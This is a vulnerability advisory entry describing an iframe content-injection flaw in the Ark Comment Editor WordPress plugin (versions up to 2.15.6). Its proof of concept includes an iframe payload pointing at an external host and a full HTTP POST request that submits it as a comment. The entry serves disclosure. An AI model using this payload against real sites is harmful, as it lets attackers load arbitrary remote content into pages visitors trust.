WordPress Plugin Vulnerabilities
Ark Comment Editor <= 2.15.6 - Iframe Injection via Comment
Description
The plugin does not properly sanitise or encode the comments when in Source editor, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page to the comment section
Proof of Concept
Go to a post in the Frontend, select the 'Source' option in the Comment box generated by the plugin and add a payload such as <iframe src="http://brutelogic.com.br/poc.svg"> Depending on the user status (e.g unauthenticated), the comment might have to be approved first for the iframe to be loaded. POST /wp-comments-post.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 131 Connection: close Upgrade-Insecure-Requests: 1 comment=%3Ciframe+src%3D%22http%3A%2F%2Fbrutelogic.com.br%2Fpoc.svg%22%3E&submit=Post+Comment&comment_post_ID=5886&comment_parent=0
Affects Plugins
References
CVE
Classification
Type
CONTENT INJECTION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Rasi Afeef
Submitter
Rasi Afeef
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-09-23 (about 2 years ago)
Added
2022-05-25 (about 1 years ago)
Last Updated
2023-02-21 (about 1 years ago)